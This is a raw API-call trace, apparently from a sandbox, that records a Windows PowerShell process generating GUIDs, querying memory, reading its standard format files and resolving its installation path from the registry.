[0079.681] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xbc626436, Data2=0xe7fd, Data3=0x466d, Data4=([0]=0x95, [1]=0x1, [2]=0x55, [3]=0x34, [4]=0x7e, [5]=0xa0, [6]=0x58, [7]=0xd6))) returned 0x0
[0079.682] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xdc0bf2e8, Data2=0x9402, Data3=0x4d2d, Data4=([0]=0xbb, [1]=0x25, [2]=0xca, [3]=0x15, [4]=0xc, [5]=0xab, [6]=0xcf, [7]=0xd0))) returned 0x0
[0079.682] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xd284b4bc, Data2=0x6e8b, Data3=0x4e6e, Data4=([0]=0x94, [1]=0xc5, [2]=0x7c, [3]=0x44, [4]=0x1b, [5]=0x64, [6]=0xd4, [7]=0xfa))) returned 0x0
[0079.682] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xe31fddc8, Data2=0x45d7, Data3=0x42cb, Data4=([0]=0xa0, [1]=0x3c, [2]=0x9c, [3]=0x10, [4]=0x8d, [5]=0x56, [6]=0x86, [7]=0x6d))) returned 0x0
[0079.682] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.682] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x6eb2e9d3, Data2=0xbee7, Data3=0x47b0, Data4=([0]=0x9a, [1]=0x69, [2]=0xb2, [3]=0xf5, [4]=0x83, [5]=0x50, [6]=0xa6, [7]=0xe7))) returned 0x0
[0079.682] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xaee6d662, Data2=0x3f35, Data3=0x41d2, Data4=([0]=0x88, [1]=0xf9, [2]=0x19, [3]=0x8f, [4]=0x79, [5]=0x99, [6]=0x2d, [7]=0xdd))) returned 0x0
[0079.683] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xb0b742cd, Data2=0x36ca, Data3=0x44e1, Data4=([0]=0xbc, [1]=0x67, [2]=0x7b, [3]=0x9a, [4]=0xc7, [5]=0xaa, [6]=0x77, [7]=0x19))) returned 0x0
[0079.683] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x5fcbb6e5, Data2=0x4c15, Data3=0x4c74, Data4=([0]=0xaa, [1]=0xbc, [2]=0x27, [3]=0xa, [4]=0x69, [5]=0xb0, [6]=0xd3, [7]=0x60))) returned 0x0
[0079.683] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xeb41ca2a, Data2=0xd1d0, Data3=0x4773, Data4=([0]=0xae, [1]=0x91, [2]=0x6b, [3]=0x92, [4]=0xd7, [5]=0xc1, [6]=0x8a, [7]=0xe4))) returned 0x0
[0079.683] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xeee224a0, Data2=0xa60b, Data3=0x47a9, Data4=([0]=0x82, [1]=0x72, [2]=0xa6, [3]=0x9, [4]=0x50, [5]=0x9b, [6]=0xfd, [7]=0x6c))) returned 0x0
[0079.683] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x253c2647, Data2=0xe9d3, Data3=0x49bb, Data4=([0]=0xb5, [1]=0xae, [2]=0x14, [3]=0xc8, [4]=0x77, [5]=0xb1, [6]=0x2b, [7]=0xcd))) returned 0x0
[0079.683] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x4e72c809, Data2=0x523, Data3=0x4b47, Data4=([0]=0xa8, [1]=0x7a, [2]=0x6d, [3]=0xad, [4]=0x5f, [5]=0x5d, [6]=0x1a, [7]=0xee))) returned 0x0
[0079.683] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x52995a70, Data2=0xc2d3, Data3=0x4820, Data4=([0]=0x94, [1]=0x7c, [2]=0x8f, [3]=0xe4, [4]=0xcd, [5]=0xe1, [6]=0x5a, [7]=0xe7))) returned 0x0
[0079.684] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xfc211bf1, Data2=0x3e98, Data3=0x452c, Data4=([0]=0xba, [1]=0xb9, [2]=0xd, [3]=0x3e, [4]=0x6a, [5]=0xd1, [6]=0xc, [7]=0x51))) returned 0x0
[0079.684] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x369f376e, Data2=0x228b, Data3=0x40e6, Data4=([0]=0x9b, [1]=0x9, [2]=0x1f, [3]=0xc8, [4]=0x33, [5]=0x29, [6]=0xb9, [7]=0x66))) returned 0x0
[0079.684] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xe1d96aa8, Data2=0x3b53, Data3=0x4c4f, Data4=([0]=0x94, [1]=0x8d, [2]=0xdb, [3]=0x4e, [4]=0xb7, [5]=0x68, [6]=0x2c, [7]=0xc5))) returned 0x0
[0079.684] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x9871b17b, Data2=0x7bd8, Data3=0x4505, Data4=([0]=0x82, [1]=0xee, [2]=0xbf, [3]=0x18, [4]=0xf1, [5]=0x7d, [6]=0x4a, [7]=0xa1))) returned 0x0
[0079.684] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x63fd1bc0, Data2=0xf828, Data3=0x4207, Data4=([0]=0xa7, [1]=0xc3, [2]=0x76, [3]=0xae, [4]=0x86, [5]=0xb6, [6]=0x65, [7]=0x66))) returned 0x0
[0079.684] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x1ce9f68c, Data2=0x3961, Data3=0x40e3, Data4=([0]=0xa7, [1]=0x9c, [2]=0xa8, [3]=0x77, [4]=0x91, [5]=0x77, [6]=0x9d, [7]=0xe3))) returned 0x0
[0079.684] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf69bc997, Data2=0xf79, Data3=0x476b, Data4=([0]=0x83, [1]=0x55, [2]=0xaf, [3]=0x5f, [4]=0xe3, [5]=0xe, [6]=0x3, [7]=0x6))) returned 0x0
[0079.685] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x6be50cd4, Data2=0x2f40, Data3=0x4c07, Data4=([0]=0xad, [1]=0xe5, [2]=0xd, [3]=0xfb, [4]=0x81, [5]=0xb2, [6]=0x75, [7]=0xcc))) returned 0x0
[0079.685] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xdf458866, Data2=0x4268, Data3=0x4322, Data4=([0]=0x81, [1]=0x14, [2]=0xc5, [3]=0x52, [4]=0xde, [5]=0x6e, [6]=0x72, [7]=0x42))) returned 0x0
[0079.685] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xc986faf4, Data2=0x3bb3, Data3=0x426d, Data4=([0]=0xaa, [1]=0x7b, [2]=0xdd, [3]=0xba, [4]=0x32, [5]=0xfc, [6]=0x5e, [7]=0x3))) returned 0x0
[0079.685] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.685] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.686] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.686] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x89d784e8, Data2=0x9277, Data3=0x4fd8, Data4=([0]=0xae, [1]=0x5c, [2]=0x3a, [3]=0x42, [4]=0x4d, [5]=0x68, [6]=0xfc, [7]=0x77))) returned 0x0
[0079.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.687] SetErrorMode (uMode=0x1) returned 0x1
[0079.687] SetErrorMode (uMode=0x1) returned 0x1
[0079.687] GetFileType (hFile=0x304) returned 0x1
[0079.687] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.718] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.718] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.718] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.719] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.719] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.719] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x119, lpOverlapped=0x0) returned 1
[0079.719] ReadFile (in: hFile=0x304, lpBuffer=0x34f59e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x34f59e8*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.719] CloseHandle (hObject=0x304) returned 1
[0079.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.726] SetErrorMode (uMode=0x1) returned 0x1
[0079.726] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
[0079.726] SetErrorMode (uMode=0x1) returned 0x1
[0079.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.726] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0079.726] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0079.726] CoTaskMemAlloc (cb=0x5a) returned 0x301e40
[0079.726] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301e40, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0079.726] CoTaskMemFree (pv=0x301e40)
[0079.726] RegCloseKey (hKey=0x304) returned 0x0
[0079.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.728] VirtualQuery (in: lpAddress=0xcb8a0, lpBuffer=0xcc760, dwLength=0x30 | out: lpBuffer=0xcc760*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.728] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf1ddc249, Data2=0x8ec3, Data3=0x4dad, Data4=([0]=0xa7, [1]=0xf4, [2]=0x59, [3]=0x98, [4]=0x42, [5]=0xc8, [6]=0xac, [7]=0x99))) returned 0x0
[0079.729] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.729] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x7fddd347, Data2=0xa10c, Data3=0x46a8, Data4=([0]=0xa8, [1]=0xcc, [2]=0x3c, [3]=0xa5, [4]=0x1, [5]=0x1b, [6]=0xc, [7]=0x2))) returned 0x0
[0079.729] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xd4d1ab09, Data2=0x4b02, Data3=0x42f0, Data4=([0]=0x94, [1]=0x64, [2]=0xb1, [3]=0x5a, [4]=0x60, [5]=0xf8, [6]=0x68, [7]=0x22))) returned 0x0
[0079.729] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x546d541c, Data2=0xbba2, Data3=0x4e96, Data4=([0]=0xa1, [1]=0x3b, [2]=0xf8, [3]=0x1c, [4]=0xd3, [5]=0x96, [6]=0x7, [7]=0x47))) returned 0x0
[0079.729] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.729] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.730] SetErrorMode (uMode=0x1) returned 0x1
[0079.730] SetErrorMode (uMode=0x1) returned 0x1
[0079.730] GetFileType (hFile=0x304) returned 0x1
[0079.730] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.730] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.747] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.747] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.747] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.747] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.747] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.747] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.748] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.748] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.748] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.748] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.749] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.749] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.749] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.749] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.750] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.750] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.750] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.751] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.751] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.751] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.751] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.751] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.751] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.751] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.752] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.752] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.752] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.752] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.752] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.752] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.755] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.755] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.755] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.755] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
